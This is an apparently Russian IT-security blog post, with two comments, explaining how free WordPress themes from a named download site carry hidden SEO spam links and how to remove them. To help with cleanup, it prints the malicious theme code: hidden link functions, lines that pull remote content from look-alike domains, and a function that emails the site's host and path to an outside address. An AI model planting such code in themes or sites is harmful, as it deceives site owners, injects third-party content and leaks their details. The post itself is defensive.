Проект "ИТ-Защита"

Вредоносный код на сайте"Бойся данайцев дары подносящих..." В общем, не ручаюсь за точность цитаты, но как-то так.

Причем же здесь какие-то "мифические дары каких-то древних данайцев" и вполне себе злободневная проблема вредоносного кода на сайте, спросите Вы? А оказывается все связано.

Вот что мне рассказал в приватной беседе знакомый блогер:
"Я начинающий блогер, год назад завел блог о кулинарии, купил домен, заказал платный хостинг, а блог мне быстро сделал знакомый студент-компьютерщик на бесплатном движке WordPress. Он же скачал на одном из сайтов Рунета бесплатную тему оформления для Вордпресса. Естественно шапку для темы нарисовал свою.
Блог начал постепенно развиваться, индексироваться поисковиками, посетители стали его почитывать, постепенно блог становился популярным. И вдруг в один прекрасный день - я вижу, что блог вообще перестал индексироваться Яндексом, т.е. в поиске осталась одна страница.
Переписка со службой поддержки Яндекса (знаменитый Платон Щукин) мне мало что дала, там мне стандартно отвечали "Вы нарушили поисковую лицензию Яндекса" и приводили правила из множества пунктов, где перечислялись различные методы "черной оптимизации", которые конечно же такой любитель, как я, не применял, да и применить их при всем желании не мог, т.к. ими не владею.
Или же приходили стандартные ответы: "Развивайте свой блог, наполняйте его уникальными статьями ... и будет Вам счастье". Я это и делал - целые 6 месяцев, а результат - все равно ноль, как была одна страница в индексе Яндекса, так и осталась одна.
Тогда я стал читать специализированные форумы и сайты сеошников. Там я вычитал много разных мнений, и про дублированный контент, который формирует сам движок Вордпресса, и про типовые темы Вордпресса, которые "якобы не взлюбил Яндекс", и про "новые блоги", которые тоже "не любит Яндекс" и еще много, много самой разной информации, которая конечно же полезна, но увы, к моей проблеме отношения не имела в корне. А еще было очень много постов, наполненных отчаянием таких же новичков блогосферы, как я, которые уже "болт забили" на свои блоги. Но я решил не сдаваться..."

Далее этот блогер обратился к нам в "веб-мастерскую" проекта ИТ-защита и вот что мы выяснили, проведя полную ревизию его блога и от его имени обратившись повторно к Платону Щукину в Яндекс. Оказывается, причина его попадания "под фильтр" поисковой системы банальна и проста, но в то же время и опасна - это скрытые ссылки в коде сайта, ведущие на целый ряд ГС (говносайтов). Итак, в файле темы оформления блога

wp-content/themes/vasha_tema/functions.php и других файлах темы содержались "закодированные" скрытые ссылки вида:

function bloqinfo($name = '') { echo '<a href="http://novlenta.ru">novlenta.ru</a> <a href="http://voqe.ru">voqe.ru</a>'; }
function bloq($name = '') { echo '<a href="http://artafish.ru">artafish.ru</a> <a href="http://alexeysedov.ru">alexeysedov.ru</a>'; }

Естественно, для пользователя эти ссылки видны не были, а вот для робота-поисковой системы - да. Это несоответствие можно было увидеть если вначале просто открыть страницу в браузере, как обычно, а затем

в браузере Опера ("Вид" - "средства разработки" - "исходный код") - увидеть исходный код страницы... и вот они несколько скрытых ссылок (кликните по миниатюре картинки!).

Исходный код страницы

Это грубейшее нарушение лицензии поисковой системы Яндекс (скрытый текст или еще хуже "скрытые ссылки").
Теперь следующий вопрос: "Как это убрать, не нарушив работу сайта"? Конечно же лучше всего разработать новую тему оформления самостоятельно, но если нет времени, навыков, да и текущая тема нравится?

Тогда вот Вам наши советы:


1. Проверить файл function.php и удалить все похожие строки:
function bloqinfo($name = '') { echo '<a href="http://novlenta.ru">novlenta.ru</a> <a href="http://voqe.ru">voqe.ru</a>'; }
function bloq($name = '') { echo '<a href="http://artafish.ru">artafish.ru</a> <a href="http://alexeysedov.ru">alexeysedov.ru</a>'; }

2. Теперь "поработаем" над строчками кода во всех остальных файлах темы:
<?php bloqinfo('name'); ?>
<?php bloq('name'); ?>
Эти строчки надо удалить, но удаляйте аккуратно и не везде (!!!), как советуют Вам на форумах, т.к. у всех темы разные и если Вы везде поудаляете эти строки, то название Вашего блога не будет, например, выводиться в шапке блога и т.д.

3. Очистить файл style.css от класса xl (он обычно в самом конце файла)

4. Из файла header.php и sidebar.php удаляем тоже ссылку в строчке:

<?php error_reporting(0); echo file_get_contents('http://www.wp3c.org/TR/xhtml/DTD/xhtml1-transitional.dtd'); ?>

5. Если Вы обнаружили еще в файлах темы следующие строки:
<?php error_reporting(0); echo file_get_contents('http://jsquery.org/jquery.js'); ?>
или
function trackTheme($name=""){

$str= 'Theme:'.$name.'
HOST: '.$_SERVER['HTTP_HOST'].'
SCRIP_PATH: '.TEMPLATEPATH.'';
$str_test=TEMPLATEPATH."/ie.css";
if(is_file($str_test)) {
@unlink($str_test);
if(!is_file($str_test)){ @mail('ddwpthemes@gmail.ru','Evidens [White]',$str); }
}
}

То их тоже лучше удалить!
Еще раз повторяю, у всех темы разные, поэтому могут быть вариации. Это лишь общие рекомендации.

5. Установить плагин ТАС (Theme Authenticity Checker) в админку Вордпресса. Этот плагин сразу отлавливает темы "с левыми ссылками".

На картинке можно увидеть результат работы плагина TAC (кликните по миниатюре картинки!):

Результат работы плагина TAC

Теперь мы попытались выяснить, а кто же и зачем все это распространяет? И выяснилось, что все пострадавшие веб-мастера скачали свои темы на сайте WordPresse.ru, наш большой совет, обходите стороной этот сайт, ничего там не закачивайте! (мы специально скачали там несколько тем, применили плагин TAC - и результаты Вы увидели на предыдущей картинке!!!)
Все бесплатные темы, которые там выложены, содержат вредоносный код, т.е. вот эти вот "скрытые вложения с ссылками".
Кто там у них на WordPresse.ru эти "зловредные данайцы", которые нам "дарят темы с вредоносами" не ясно, может это авторы самих тем, может переводчики тем, может администрация самого сайта... Но факт есть факт. А вообще, так не делают дела, ребята, хотите рекламировать свои сайты на бесплатных темах - ставьте открытые ссылки!

А распространяют этот вредоносный хлам, чтобы скорее проиндексировать и накачать пузомерки (ТИЦ и ПР) целых сеток ГС (говносайтов) для массовой торговли ссылками на биржах, подробности здесь.

Подробно эта тема освещается на блогах и форумах Рунета:

Циники и умники нам скажут: "бесплатный сыр бывает только в мышеловке", платите за темы денежки или нанимайте крутых разработчиков - и не будет Вам никаких вредоносов...
Не согласимся: деньги, господа крутые коммерсанты, не спасут Вас от банального мошенничества и жульничества. Наоборот, вы будете "Лохами в квадрате". Ибо непорядочные веб-мастера вложат Вам "скрытые ссылки" и в платные темы, да еще так "профессионально" вложат, что Вам их и не достать из исходного кода будет вообще никак. Только тему меняй. Но "кидалово" со стороны так называемых крутых разработчиков - это тема отдельного разговора, которую мы тоже думаем осветить на нашем блоге.

Вот и все на сегодня. Во второй части статьи мы дадим общие советы по очистке сайта от вредоносного кода на сайте.

Ваш покорный слуга, Сисадмин.

Продолжение данной тематики:

"Вредоносный код на сайте, что же делать? Часть 2."

"Вредоносный код на сайте, что же делать? Часть 3."

Вредоносный код на сайте, а кто за кулисами? Часть 4.

Вредоносный код на сайте: теперь и в режиме он-лайн. Часть 5.

 





Отправить статью в социальные сети, на печать, e-mail и в другие сервисы:

Комментарии

2 комментариев

  1. Комментарий by Wild Cat — 24 Февраль 2012 @ 13:22

    Я нашла эту дрянь, эти ссылки, когда делала блог на заказ.
    Тему скачала в Инете на долбанном сайте Вордпрессе.ru , стала переделывать на вкус заказчика и… вот тебе эти ссылки. поудаляла все от греха подальше! Кстати, летом Яндекс порезал (под фильтры пустил) очень много новых блогов, причина наверное в этом.

  2. Пинг by Вредоносный код на сайте, что же делать? Часть 2. | Блог по ИТ безопасности — 27 Февраль 2012 @ 12:34

    [...] Вредоносный код на сайте, что же делать? Часть 1. [...]

RSS лента комментариев к этой записи.

Извините, комментирование на данный момент закрыто.